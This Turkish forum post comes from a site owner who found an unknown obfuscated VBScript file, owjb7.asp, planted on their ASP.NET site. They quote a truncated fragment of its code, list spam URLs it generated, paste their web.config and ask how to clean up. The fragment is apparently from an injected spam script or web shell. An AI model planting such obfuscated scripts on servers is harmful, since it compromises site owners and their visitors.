vbscript sunucu tarafında otomatik oluşuyor.

Merhaba

Aspx tabanında yazılmış bir sitem var ve bu sitede bugün itibarile ftp ile dosya atmak istediğim zaman

owjb7.asp olarak bir sayfanın olduğu gördüm. dosyayı notepad ile açtığım zaman şifrelenmiş olduğunu gördüm.

Kodun bir bölümü

Dim YY7YYY,YYY777,YYY77Y,YYY7Y7,YYY7YY
Set YYY77Y=Response:Set YYY777=Request:Set YYY7YY=Session:Set YY7YYY=Application:Set YYY7Y7=Server
Y7Y7777=YYYYY7()
Y777Y7Y=YYYYYY()
Y7Y777Y=Trim(YYY777.QueryString)
Y7Y77Y7=YYY777.ServerVariables(Y7777YY("w%%!0w~$%")) ..................

 

google üzerinden ve form üzerinden aradığım zaman tam olarak bir çözüme ulaşamadım.

Sayfayı incelemek için subdomain üzerine kopyaladım ve sayfayı çağırdım. http://www . siteadı.com.tr/owjb7.asp olarak site geliyor biraz bekliyor ve anasayfa açılıyor. Sonrasında google üzerinden search consol tarafına baktığımda bu sayfaya ait olan bir takım sayfaların linkleri olduğunu gördüm.

http://siteadı.com.tr/owjb7.asp?/auc-gadget/dt-t1875/=HIk/dG/mG/.kc

http://siteadı.com.tr/owjb7.asp?/hirochishop/4505-0495/=mVW/FXu/hmk/.Wz

Proje üzerinde bulunan webconfig dosyasının ayarlarını kontrol ettim normal

<configuration>
  <system.web>
    <compilation debug="false" targetFramework="4.5">
      <assemblies>
        <add assembly="System.Web.Routing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
      </assemblies>
    </compilation>
    <authentication mode="Forms">
      <forms loginUrl="admin.aspx" defaultUrl="~/admin/yonetim_paneli.aspx" timeout="30" slidingExpiration="true"/>
    </authentication>
    <authorization>
      <allow users="*"/>
    </authorization>
      <customErrors mode="On" defaultRedirect="~/hata/404.aspx">
      <error statusCode="404" redirect="~/hata/404.aspx"/>
      <error statusCode="403" redirect="~/hata/404.aspx"/>
    </customErrors>
        
    <pages>
      <controls>
        <!-- admin bölümü -->
        <add src="~/admin/uct/dlbl.ascx" tagPrefix="usct" tagName="lbld"/>
        <add src="~/admin/uct/dtxt.ascx" tagPrefix="usct" tagName="txtd"/>
        <add src="~/admin/uct/mtxt.ascx" tagPrefix="usct" tagName="txtm"/>
        <add src="~/admin/uct/ktxt.ascx" tagPrefix="usct" tagName="txtk"/>
        <add src="~/admin/uct/idlbl.ascx" tagPrefix="usct" tagName="lblid"/>
        <add src="~/admin/uct/kdrp.ascx" tagPrefix="usct" tagName="drpk"/>

        <add tagPrefix="CKEditor" namespace="CKEditor.NET" assembly="CKEditor.NET"/>
        
        <add src="~/admin/ucl/rptdlbl.ascx" tagPrefix="uscl" tagName="lbldrpt"/>
        <!-- admin bölümü </> -->
              <!-- Site Bölümü -->
          <add src="~/usrc/tlistesi.ascx" tagPrefix="uscw" tagName="testl"/>
         <add src="~/usrc/umenu.ascx" tagPrefix="uscw" tagName="ustmenu"/>
      <!-- Site Bölümü </>-->
      </controls>
    </pages>
    
  <httpRuntime targetFramework="4.5"/>
  </system.web>
  <location path="admin">
    <system.web>
      <authorization>
        <deny users="?"/>
        <allow users="admin"/>
      </authorization>
    </system.web>
  </location>
  <system.webServer>
    
  </system.webServer>

daha öncede bu kod yapsı ile sitelerim var (onlarıda kontrol ettim) problem yok.

Bir tek bu projede bir dosyanın okuma-yazma izinlerini sunucu tarafından açtım. Şimdi ise kapadım.

Hosting firması ile konuyu görüştüm bunun sebebini öğrenmek ve düzenlemek için

İki konudan bahsettiler biri dosya okuma-yazma izni bir diğeri ise ftp ile dosya yüklediğim makine üzerinde bulanan bir exploit virüs olabileceğini söyledi.

Benim bu konuda biraz karıştım. Kullandığım makineyi taratmam lazım mı yoksa sadece dosya okuma-yazma iznini kaldırmam yeterli mi?

(Bilgisayarı bit defender ile tarattım normal.)